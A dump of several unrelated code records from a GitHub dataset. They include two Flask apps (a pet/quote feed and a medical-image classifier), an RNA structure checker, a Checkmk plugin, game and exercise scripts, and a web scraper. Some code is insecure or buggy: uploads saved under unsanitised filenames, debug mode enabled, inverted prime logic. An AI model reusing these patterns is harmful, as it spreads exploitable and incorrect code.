go to\n# appropriate section\n@app.route(\"/reload2\", methods=[\"GET\", \"POST\"])\ndef reload2():\n # check if logged in\n if not (\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n if request.method == \"POST\":\n return redirect(\"/feed#fact\")\n else:\n return redirect(\"/feed#quotes\")\n\n# reload route for memes, will go to appropriate section\n@app.route(\"/reloadMeme\")\ndef reload3():\n # check if logged in\n if not (\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n return redirect(\"/feed#meme\")\n\n# logout route\n@app.route(\"/logout\")\ndef logout():\n # pop user from session and redirect to login page(root)\n if \"user\" in session:\n session.pop(\"user\")\n session.pop('_flashes', None)\n flash(\"You have been logged out successfully!\")\n return redirect(\"/\")\n\n@app.route(\"/signup\")\ndef signup():\n # otherwise, load the feed\n return render_template(\"signup.html\")\n\n@app.route(\"/home\")\ndef homeee():\n # 
otherwise, load the feed\n return redirect(\"/\")\n\n# @app.route(\"/feed\")\n# def logginnn():\n# # otherwise, load the feed\n# return render_template(\"feed.html\")\n\n@app.route(\"/quote\")\ndef quote():\n global flashMessage\n global username\n global liked\n global liked_a\n # otherwise, load the feed\n url = 'https://favqs.com/api/qotd'\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n session.pop('_flashes', None)\n flashMessage = \"TO LIKE QUOTE, PLEASE LOG IN!!\"\n #flash(flashMessage)\n liked = d['quote']['body']\n liked_a = d['quote'][\"author\"]\n return render_template(\"quote.html\", link = d['quote']['body'], auth = d['quote'][\"author\"] )\n\n@app.route(\"/add_quote\")\ndef add_quote():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n print(username)\n userMethods.addWord(username, liked_quotes)\n texts = userMethods.likedWords(username)\n texts = texts.split(\"|\")\n texts = texts[1:]\n # print(\"\\n\\n\\nPRINTING TEXT============\\n\")\n # print(texts)\n session.pop('_flashes', None)\n flash(\"Text liked. Go to liked text to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/catpic\")\ndef catpic():\n global flashMessage\n global username\n global liked\n url = \"https://aws.random.cat/meow\"\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n session.pop('_flashes', None)\n # print(\"USERNAME\")\n # print (username)\n liked = d['file']\n flashMessage = \"TO LIKE PHOTO, PLEASE LOG IN!!\"\n #flash(flashMessage)\n # otherwise, load the feed\n return render_template(\"catpic.html\", link = d['file'])\n\n@app.route(\"/add_cat\")\ndef add_cat():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n # print(username)\n userMethods.addImage(username, liked_cats)\n images = userMethods.likedImages(username)\n images = images.split(\",\")\n images = images[1:]\n # print(\"\\n\\n\\nPRINTING IMAGES============\\n\")\n # print(images)\n session.pop('_flashes', None)\n flash(\"Image liked. 
Go to liked pictures to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/dogpic\")\ndef dogpic():\n global username\n global liked\n url = \"https://random.dog/woof.json\"\n status = True\n while(status):\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n dict = json.loads(straw)\n print(dict[\"url\"][-3:])\n if(dict[\"url\"][-3:] != \"mp4\"):\n status = False\n session.pop('_flashes', None)\n # liked = d['url']\n\n flashMessage = \"TO LIKE PHOTO, PLEASE LOG IN!!\"\n #flash(flashMessage)\n # otherwise, load the feed\n return render_template(\"dogpic.html\", link = dict['url'])\n\n@app.route(\"/add_dog\")\ndef add_dog():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n # print(username)\n userMethods.addImage(username, liked_dogs)\n images = userMethods.likedImages(username)\n images = images.split(\",\")\n images = images[1:]\n # print(\"\\n\\n\\nPRINTING IMAGES============\\n\")\n # print(images)\n session.pop('_flashes', None)\n flash(\"Image liked. Go to liked pictures to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/fact\")\ndef fact():\n global username\n global liked\n url = \"http://randomuselessfact.appspot.com/random.json?language=en\"\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n session.pop('_flashes', None)\n flashMessage = \"TO LIKE FACT, PLEASE LOG IN!!\"\n #flash(flashMessage)\n liked = d['text']\n # print(\"dfadsfds\")\n # print (liked)\n # # otherwise, load the feed\n return render_template(\"fact.html\", link = d['text'])\n\n@app.route(\"/add_fact\")\ndef add_fact():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n print(username)\n userMethods.addWord(username, liked_facts)\n texts = userMethods.likedWords(username)\n texts = texts.split(\"|\")\n texts = texts[1:]\n # print(\"\\n\\n\\nPRINTING TEXT============\\n\")\n # print(texts)\n session.pop('_flashes', None)\n flash(\"Text liked. 
Go to liked text to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/meme\")\ndef meme():\n global flashMessage\n f = open(\"./api/meme.txt\", \"r\")\n mykey = f.readline().strip()\n url = \"http://api.giphy.com/v1/gifs/random?api_key=\" + mykey + \"&tag=meme&rating=pg\"\n print(url)\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n print(d['data']['url'])\n session.pop('_flashes', None)\n flashMessage = \"TO LIKE GIF, PLEASE LOG IN!!\"\n #flash(flashMessage)\n # otherwise, load the feed\n return render_template(\"meme.html\",link = d['data']['url'], em = d['data']['embed_url'])\n\n\n\n# run flask app with debug set to true\nif __name__ == \"__main__\":\n app.run(debug = True)\n","repo_name":"tangym27/ruffLife","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26921351849","text":"from flask import Flask, request, render_template, Response, redirect , url_for\nimport tensorflow as tf\nfrom keras import backend as K\nimport cv2\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport numpy as np\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\nimport os\nimport PIL.Image as Image\n\nmodel = tf.keras.models.load_model(\"CNN.model\")\nmodel.load_weights(\"model.h5\")\nmodel._make_predict_function()\n\n#from werkzeug import secure_filename\nmodel1 = tf.keras.models.load_model(\"CNN_PNEMONIA.model\")#model.save_weights(\"model.h5\")\nmodel1.load_weights(\"model_pnemonia.h5\")\nmodel1._make_predict_function()\n\n#torch.save(model_conv,'cnn.pt')\nthe_model = torch.load('cnn.pt')\nthe_model.eval()\n\ndef generate_prediction(img):\n IMG_SIZE = 100\n img_array = cv2.imread(img, cv2.IMREAD_GRAYSCALE)\n img_array = img_array/255.0\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n input = new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n return input\n\ndef generate_prediction_p(img):\n sample_image = cv2.imread(img)\n sample_image = cv2.resize(sample_image, (224,224))\n if sample_image.shape[2] ==1:\n sample_image = np.dstack([sample_image, sample_image, sample_image])\n sample_image = cv2.cvtColor(sample_image, cv2.COLOR_BGR2RGB)\n sample_image = sample_image.astype(np.float32)/255.\n #sample_label = 1\n sample_image_processed = np.expand_dims(sample_image, axis=0)#since we pass only one image,we expand dim to include\n #batch size 1\n return sample_image_processed\n\ndef generate_prediction_t(img):\n sample_image = Image.open(img)\n transform = transforms.Compose([ \n transforms.Resize(256), \n transforms.CenterCrop(224), \n transforms.ToTensor(), \n transforms.Normalize( \n mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225]\n )])\n img_t = transform(sample_image)\n return img_t\n \n\napp = Flask(__name__)\n#app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n@app.route('/')\ndef templates():\n return render_template('d.html')\n\n@app.route('/Body_Segment')\ndef Body_Segment():\n return render_template('mypage.html')\n\n@app.route('/Pneumonia_Detection')\ndef Pneumonia_Detection():\n return render_template('mypage1.html')\n\n@app.route('/Tumor_Detection')\ndef Tumor_Detection():\n return render_template('mypage2.html')\n\n@app.route('/results_for_segment', methods=['POST','GET'])\ndef results_for_segment():\n app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n\n c = [\"Brain\", 
\"Hands\", \"Kidney\", \"Legs\", \"Lungs\", \"Skull\", \"Teeth\"]\n K.clear_session()\n if request.method == \"POST\":\n f = request.files['file']\n f.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n FOLDER = f.filename\n predi=generate_prediction(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n \n pred= model.predict(predi)\n predi = list(pred[0])\n #final = dict(zip(c, prediction)) \n prediction = c[predi.index(max(predi))]\n accuracy = max(predi)\n accuracy = round((accuracy * 100),2)\n final_acc = str(accuracy) + \"%\"\n return render_template('mypage.html',image = FOLDER,prediction_text=prediction,prediction_acc = final_acc)\n\n@app.route('/results_for_p', methods=['POST','GET'])\ndef results_for_p():\n app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n K.clear_session()\n if request.method == \"POST\":\n f = request.files['file']\n f.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n FOLDER = f.filename\n predi=generate_prediction_p(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n prediction = model1.predict(predi)\n prediction = list(prediction[0])\n #final_acc= prediction.index(max(prediction))\n accuracy = max(prediction)\n accuracy = round((accuracy * 100),2)\n final_acc = str(accuracy) + \"%\"\n if accuracy < 65.00:\n prediction = \"Normal\"\n else:\n prediction = \"Pneumonia\"\n return render_template('mypage1.html',image1 = FOLDER,prediction_text=prediction,prediction_acc = final_acc)\n\n@app.route('/results_for_t', methods=['POST','GET'])\ndef results_for_t():\n app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n K.clear_session()\n if request.method == \"POST\":\n f = request.files['file']\n f.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n FOLDER = f.filename \n #img_t = transform(app.config[\"IMAGE_UPLOADS\"], f.filename)\n predi = generate_prediction_t(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n batch_t = torch.unsqueeze(predi, 0)\n out = the_model(batch_t)\n #print(out.shape)\n class1 = [\"No\", \"Yes\" ]\n _, index = torch.max(out, 1)\n percentage = torch.nn.functional.softmax(out, dim=1)[0] * 100\n prediction = class1[index[0]]\n accuracy = percentage[index[0]].item()\n accuracy = round(accuracy,2)\n final_acc = str(accuracy) + \"%\"\n return render_template('mypage2.html',image2 = FOLDER,prediction_text=prediction,prediction_acc = final_acc)\n\nif __name__ == '__main__':\n #app.debug = True\n app.run(host='192.168.8.25',port=5000)\n \n","repo_name":"PriyankaPSonawane/classify","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70622119527","text":"import time\n####### DATA BASE OF WANTED crRNA STRUCTURES ##### \ndatabase_nupack=[\n###### Structures from NUPACK RUNS#####\n'(((((.((.......)))))))....(((.....)))',\n'(.((((((.((((.....)))).)))))).)', \n'(((((.((.......)))))))....((((...........))))',\n#'(.((((((.((((....)))).)))))).)',\n'...(((((.((.......)))))))....((((...........))))',\n'...(((((.((.......)))))))....((((...........))))',\n'((((((.........).)))))....((((...........))))',\n\n#### lowest lbu backbone structure in NUPACK\n'(((((.((.......)))))))....((((...........))))',\n#### lowest lwa backbone structure in NUPACK\n'((.(((((....((((.........)))).))))).))',\n\n#### subopt lwa backbone alternative\n'(((((....((((.........)))).)))))',\n\n#### STRUCTURE FROM CELL PAPER 
####\n'.....(((((.........))))..)....'\n]\n\n\ndatabase_mfold=[\n#lwa backbone structure mfold\n'((.(((((....((((.........)))).))))).))',\n#lsh backbone structure mfold\n'(((((...........)))))'\n#lbu backbone structure mfold\n\n#### Structure Lsh\n'((((((((.((.......)))))))....((((...........))))'\n]\n\n\nsequence_database={\n# LWA BACKBONE\n'lwaCas13a':'GAUUUAGACUACCCCAAAAACGAAGGGGACUAAAAC',\n# LSH BACKBONE\n'lshCas13a':'GGAUAUAGACCACCCCAAUAUCGAAGGGGACUAAAAC',\n# LBU BACKBONE\n'lbuCas13a':'GACCACCCCAAAAAUGAAGGGGACUAAAACA'\n}\n\n####### ANALYSIS FUNCTIONS FOR NUPACK #####\n\ndef analysis_structure(inputfile):\n\twith open(inputfile,'r') as input_file:\n\t\tlines=input_file.readlines()\n\ti=0\n\tresults=[]\n\tfor line in lines:\n\t\t\n\t\tif line[0:3]=='% %':\n\t\t\ttry:\n\t\t\t\tresults.append(lines[i+3])\n\t\t\texcept IndexError:\n\t\t\t\tcontinue\n\t\tif line.startswith('% Sequence:'):\n\t\t\tsequence=line[13:]\n\t\ti=i+1\n\tk=0\n\tj=0\n\tfor structure in database_nupack:\n\t\tk=k+1\n\t\tfor result in results:\n\t\t\t\n#\t\t\tprint structure\n#\t\t\tprint result\n\t\t\tif structure in result:\n#\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n#\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\t\tif j==0:\n\t\t\t\t\tcount=result.index(structure)\n\t\t\t\t\tprint('\\nGOOD NEWS! YOU\\'VE GOT THE RIGHT SECONDARY STRUCTURE!')\n\t\t\t\t\tprint('YOUR SEQUENCE WAS:\\n')\n\t\t\t\t\tprint(sequence)\n#\t\t\t\t\tprint('THE MATCHED SECONDARY STRUCTURE IS:')\n\t\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n\t\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\t\t\tj=j+1\n\t\t\telif k==len(database_nupack):\n\t\t\t\tif j==0:\n\t\t\t\t\tprint('''\n\t\t#################### CAUTION! ##################### \n\t\tYOUR SECONDARY STRUCTURE DOES NOT FIT OUR DATA BANK\n\t\t#################### CAUTION! #####################\\n\\n ''')\n\t\t\t\t\tprint('YOUR SEQUENCE AND MOST STABLE PREDICTED STRUCTURE IS:\\n')\n#\t\t\t\tprint(sequence)\n#\t\t\t\tprint('THE PREDICTED MOST STABLE STRUCTURE IS:')\n\t\t\t\t\tprint(sequence[0:-2])\n\t\t\t\t\tprint(str(results[0][0:-2]))\n\t\t\t\t\n\t\t\t\n\treturn()\n\ndef mfold_analysis(input):\n\tprint('''\n\n#######################################################################################\n#################### MFOLD SECONDARY STRUCTURE VERIFICATION ###########################\n#######################################################################################\n\n''')\n\tsequence, structure_in = input\n\tresult=structure_in[:-9]\n\tenergy=structure_in[-10:-2]\n\tenergy=energy.replace('\\t','')\n\tenergy=energy.replace('(','')\n\tenergy=energy.replace(')','')\n\tenergy=energy.replace(' ','')\n#\tprint sequence\n#\tprint result\n#\tprint energy\n\tk=0\n\tj=0\n\t\n\tfor structure in database_mfold:\n\t\tk=k+1\n\t\tif structure in result:\n#\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n#\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\tif j==0:\n\t\t\t\tcount=result.index(structure)\n\t\t\t\t\n\t\t\t\tprint('\\nGOOD NEWS! 
mFOLD WEBSERVER CONFIRMS YOUR STRUCTURE')\n\t\t\t\tprint('YOUR SEQUENCE WAS:\\n')\n\t\t\t\tprint(sequence)\n#\t\t\t\tprint('THE MATCHED SECONDARY STRUCTURE IS:')\n\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\t\tj=j+1\n\t\telif k==1:\n\t\t\tif j==0:\n\t\t\t\tprint('''\n\t\t#################### CAUTION! ##################### \n\t\tmFOLD SECONDARY STRUCTURE DOES NOT FIT OUR DATA BANK\n\t\t#################### CAUTION! #####################\\n\\n''')\n\t\t\t\tprint('YOUR SEQUENCE AND MOST STABLE PREDICTED STRUCTURE IS:\\n')\n#\t\t\t\tprint(sequence)\n#\t\t\t\tprint('THE PREDICTED MOST STABLE STRUCTURE IS:')\n\t\t\t\tprint(sequence[0:-2])\n\t\t\t\tprint(str(result[0:-2]))\n\tprint('______________________________________________________________________________________\\n')\n\tprint('Job ended normally. '+str(time.strftime(\"%c\")))\n\n\ndef free_energy(inputfile):\n\twith open(inputfile,'r') as input_file:\n\t\tlines=input_file.readlines()\n\ti=0\n\tfree_energies=[]\n\tfor line in lines:\n\t\t\n\t\tif line[0:3]=='% %':\n\t\t\ttry:\n\t\t\t\tfree_energies.append(lines[i+2])\n\t\t\texcept IndexError:\n\t\t\t\tcontinue\n\t\ti=i+1\n\t\n\t\t\t\n\treturn()\n\ndef analysis_sequence(inputfile):\n\twith open(inputfile,'r') as input_file:\n\t\tlines=input_file.readlines()\n\ti=0\n\tfor line in lines:\n\t\t\n\t\tif line.startswith('% Sequence:'):\n\t\t\tsequence=line[12:]\n\t\ti=i+1\n\tj=0\n\tk=0\n\tfor seq in sequence_database:\n#\t\tprint(seq)\n\t\tif sequence_database[seq] in sequence:\n\t\t\tif j==0:\n\t\t\t\tprint(len(sequence)*'_' + '\\n')\n\t\t\t\tprint( '\t\tYOUR BACKBONE SEQUENCE HAS BEEN FOUND IN THE DATABANK')\n\t\t\t\tprint( '\t\tIT CORRESPONDS TO THE BACKBONE SEQUENCE OF: '+str(seq))\n\t\t\t\tprint('______________________________________________________________________________________\\n')\n\t\t\t\tprint('Job ended normally. '+str(time.strftime(\"%c\")))\n#\t\t\t\tprint(seq)\n\t\t\t\tj=j+1\n\t\telse:\n\t\t\tif k==len(sequence_database):\n\t\t\t\tprint('''\n\t\t#################### CAUTION! ##################### \n\t\tBACKBONE STRUCTURE UNKNOWN, PLEASE HANDLE WITH CARE\n\t\t#################### CAUTION! #####################\\n\\n ''')\n\t\t\t\tprint('______________________________________________________________________________________\\n')\n\t\t\t\tprint('Job ended normally. 
'+str(time.strftime(\"%c\")))\n\treturn()\n\t\n\t\n\t\n#analysis_structure('input.tmp.subopt')\n#analysis_sequence('input.tmp.subopt')\n\n\n","repo_name":"igemsoftware2017/igem_munich_2017","sub_path":"python/secondary_structure_analysis.py","file_name":"secondary_structure_analysis.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25221309577","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8; py-indent-offset: 4 -*-\n\nfrom pathlib import Path\nfrom typing import Any, Dict\n\nfrom .bakery_api.v1 import FileGenerator, OS, Plugin, register\n\n\ndef get_yum_files(conf: Dict[str, Any]) -> FileGenerator:\n yield Plugin(base_os=OS.LINUX,\n source=Path(\"yum\"),\n interval=conf.get(\"interval\"))\n\n\nregister.bakery_plugin(\n name=\"yum\",\n files_function=get_yum_files,\n)\n","repo_name":"HenriWahl/checkmk-agent-plugin-yum","sub_path":"lib/python3/cmk/base/cee/plugins/bakery/yum.py","file_name":"yum.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"4011162541","text":"#1.write a python function to find the max of three numbers.\r\nx= int(input())\r\ny= int(input())\r\nz= int(input())\r\ndef fun1(x,y): #x=11 , y= 14\r\n if x > y:\r\n return x\r\n return y\r\ndef fun2( x, y, z ):\r\n return fun1( x, fun1( y, z ))\r\nprint(fun2(x,y,z))\r\n\r\n# # #2.Write a Python function to sum all the numbers in a list.\r\n# def sum(numbers):\r\n# total = 0\r\n# for x in numbers:\r\n# total += x\r\n# return total\r\n#\r\n# print(sum((8, 2, 3, 0, 7)))\r\n#\r\n# # #3.Write a Python function that takes a list and returns a new list with unique elements of the first list.\r\n# def list1(l):\r\n# num = []\r\n# for a in l:\r\n# if a not in num:\r\n# num.append(a)\r\n# return num\r\n# print('unique elements are')\r\n# print(list1([1,2,4,5,4,5,6,9,10]))\r\n# #\r\n# # #4.Write a Python function that takes a number as a parameter and check the number is prime or not.\r\n# # def prime(a):\r\n# # for i in range (2,a) :\r\n# # if a % i == 0 :\r\n# # print(\"number is prime\")\r\n# # else:\r\n# # print(\"number is not prime\")\r\n# # a = int(input(\"Enter a number : \"))\r\n# # prime(a)\r\n# #\r\n# #\r\n# #\r\n# # #5.Write a Python function that checks whether a passed string is palindrome or not.\r\n# # def pal(a):\r\n# #\r\n# # if (a == a[::-1]):\r\n# print(\"The string is a palindrome\")\r\n# else:\r\n# print(\"The string is not a palindrome\")\r\n#\r\n# a = input(\"Enter string:\")\r\n# pal(a)","repo_name":"anirbang324/Python-Basics-to-Advance-","sub_path":"function_1.py","file_name":"function_1.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36417775460","text":"# Made by Mr. 
- Version 0.3 by DrLecter\nimport sys\nfrom com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"326_VanquishRemnants\"\n\nRED_CROSS_BADGE,BLUE_CROSS_BADGE,BLACK_CROSS_BADGE, = range(1359,1362)\nADENA = 57\nBLACK_LION_MARK = 1369\n\nDROPLIST={\n20053:[RED_CROSS_BADGE,25],\n20437:[RED_CROSS_BADGE,25],\n20058:[RED_CROSS_BADGE,25],\n20061:[BLUE_CROSS_BADGE,25],\n20063:[BLUE_CROSS_BADGE,25],\n20436:[BLUE_CROSS_BADGE,25],\n20439:[BLUE_CROSS_BADGE,25],\n20438:[BLACK_CROSS_BADGE,35],\n20066:[BLACK_CROSS_BADGE,25],\n}\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)\n\n def onEvent (self,event,st) :\n htmltext = event\n if event == \"30435-03.htm\" :\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n elif event == \"30435-07.htm\" :\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\n def onTalk (self,npc,player):\n htmltext = \"You are either not carrying out your quest or don't meet the criteria.\"\n st = player.getQuestState(qn)\n if not st : return htmltext\n\n npcId = npc.getNpcId()\n id = st.getState()\n if id == CREATED :\n st.set(\"cond\",\"0\")\n if st.getInt(\"cond\")==0 :\n if player.getLevel() >= 21 :\n htmltext = \"30435-02.htm\"\n else:\n htmltext = \"30435-01.htm\"\n st.exitQuest(1)\n else :\n red=st.getQuestItemsCount(RED_CROSS_BADGE)\n blue=st.getQuestItemsCount(BLUE_CROSS_BADGE)\n black=st.getQuestItemsCount(BLACK_CROSS_BADGE)\n if red+blue+black == 0 :\n htmltext = \"30435-04.htm\"\n else :\n htmltext = \"30435-05.htm\"\n st.giveItems(ADENA,60*red+65*blue+70*black)\n st.takeItems(RED_CROSS_BADGE,-1)\n st.takeItems(BLUE_CROSS_BADGE,-1)\n st.takeItems(BLACK_CROSS_BADGE,-1)\n if red+blue+black >= 100 :\n htmltext = \"30435-09.htm\"\n if st.getQuestItemsCount(BLACK_LION_MARK) == 0 :\n st.giveItems(BLACK_LION_MARK,1)\n htmltext = \"30435-06.htm\"\n return htmltext\n\n def onKill(self,npc,player,isPet):\n st = player.getQuestState(qn)\n if not st : return \n if st.getState() != STARTED : return \n \n item,chance=DROPLIST[npc.getNpcId()]\n if st.getRandom(100)= end:\n if n2_nums[start] + n2_nums[end] == finalTarget:\n aList = []\n aList.append(n1)\n aList.append(n2)\n aList.append(n2_nums[start])\n aList.append(n2_nums[end])\n if aList not in answerList:\n answerList.append(aList)\n start += 1\n elif n2_nums[start] + n2_nums[end] < finalTarget:\n start += 1\n else:\n end -= 1\n return answerList\n\nsum = Solution()\n'''\nanswer = sum.fourSum([5,5,3,5,1,-5,1,-2], 4)\nprint(answer)\n'''\nanswer = sum.fourSum([0,4,-5,2,-2,4,2,-1,4], 12)\nprint(answer)\n\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"18_4Sum/Q18_4sum.py","file_name":"Q18_4sum.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18157708413","text":"from scrapy.crawler import CrawlerProcess\r\nimport scrapy\r\n\r\nclass Spider(scrapy.Spider):\r\n name = 'dolar'\r\n start_urls = [\r\n 'https://dolarhoy.com/'\r\n ]\r\n custom_settings = {\r\n 'FEED_URI': 'dolar_hoy.csv',\r\n 'FEED_FORMAT': 'csv',\r\n 'FEED_EXPORT_ENCODING': 'utf-8'\r\n \r\n }\r\n\r\n def parse(self,response):\r\n links = response.xpath(\"//div[@class='tile is-parent is-7 is-vertical']//a/@href\").getall()\r\n\r\n for link in links:\r\n yield response.follow(link, callback=self.parse_link, 
cb_kwargs={'url': response.urljoin(link)})\r\n\r\n def parse_link(self, response, **kwargs):\r\n link = kwargs['url']\r\n \r\n nombre = response.xpath('//div[@class=\"tile is-child title\"]/text()').get()\r\n compra = response.xpath('//*[@id=\"sitio\"]/section/div/div[2]/div[2]/div[1]/div[2]/div[1]/div[2]/text()').get() \r\n venta = response.xpath('//*[@id=\"sitio\"]/section/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]/text()').get() \r\n fecha = response.xpath('//div[@class=\"tile is-child\"]/span/text()').get()\r\n \r\n yield {\r\n 'title': nombre, \r\n 'Compra':compra, \r\n 'Venta':venta, \r\n 'Fecha':fecha,\r\n 'url': link\r\n }\r\n\r\nprocess = CrawlerProcess()\r\nprocess.crawl(Spider)\r\nprocess.start()\r\n ","repo_name":"JuaniBarra19/Challenge","sub_path":"Challenge 2.py","file_name":"Challenge 2.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72638624808","text":"import dataclasses\nimport os\nimport sys\nimport tempfile\nimport textwrap\nimport uuid\nfrom typing import Any, Dict, Iterator, Optional, Union\n\nimport yahp as hp\nfrom libcloud.storage.providers import get_driver\nfrom libcloud.storage.types import ObjectDoesNotExistError\n\n__all__ = [\"ObjectStoreHparams\", \"ObjectStore\"]\n\n\n@dataclasses.dataclass\nclass ObjectStoreHparams(hp.Hparams):\n \"\"\":class:`~composer.utils.object_store.ObjectStore` hyperparameters.\n\n .. rubric:: Example\n\n Here's an example on how to connect to an Amazon S3 bucket. This example assumes:\n\n * The container is named named ``MY_CONTAINER``.\n * The AWS Access Key ID is stored in an environment variable named ``AWS_ACCESS_KEY_ID``.\n * The Secret Access Key is in an environmental variable named ``AWS_SECRET_ACCESS_KEY``.\n\n .. testsetup:: composer.utils.object_store.ObjectStoreHparams.__init__.s3\n\n import os\n\n os.environ[\"AWS_ACCESS_KEY_ID\"] = \"key\"\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"secret\"\n\n .. doctest:: composer.utils.object_store.ObjectStoreHparams.__init__.s3\n\n >>> from composer.utils import ObjectStoreHparams\n >>> provider_hparams = ObjectStoreHparams(\n ... provider=\"s3\",\n ... container=\"MY_CONTAINER\",\n ... key_environ=\"AWS_ACCESS_KEY_ID\",\n ... secret_environ=\"AWS_SECRET_ACCESS_KEY\",\n ... )\n >>> provider = provider_hparams.initialize_object()\n >>> provider\n \n\n Args:\n provider (str): Cloud provider to use.\n\n See :class:`ObjectStore` for documentation.\n container (str): The name of the container (i.e. bucket) to use.\n key_environ (str, optional): The name of an environment variable containing the API key or username\n to use to connect to the provider. If no key is required, then set this field to ``None``.\n (default: ``None``)\n\n For security reasons, composer requires that the key be specified via an environment variable.\n For example, if your key is an environment variable called ``OBJECT_STORE_KEY`` that is set to ``MY_KEY``,\n then you should set this parameter equal to ``OBJECT_STORE_KEY``. Composer will read the key like this:\n\n .. testsetup:: composer.utils.object_store.ObjectStoreHparams.__init__.key\n\n import os\n import functools\n from composer.utils import ObjectStoreHparams\n\n os.environ[\"OBJECT_STORE_KEY\"] = \"MY_KEY\"\n ObjectStoreHparams = functools.partial(ObjectStoreHparams, provider=\"s3\", container=\"container\")\n\n .. 
